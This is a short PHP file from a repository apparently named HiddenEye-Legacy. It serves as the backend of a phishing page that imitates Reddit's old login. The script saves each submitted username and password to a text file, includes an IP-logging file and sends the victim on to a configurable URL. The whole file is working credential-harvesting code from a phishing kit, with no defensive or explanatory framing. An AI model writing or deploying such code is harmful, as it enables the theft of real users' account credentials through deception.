HiddenEye-Legacy/WebPages/Reddit-old/login.php
Usama Abdul Sattar d505c67259
Reddit pages added
2019-07-12 10:58:31 +05:00

7 lines
186 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();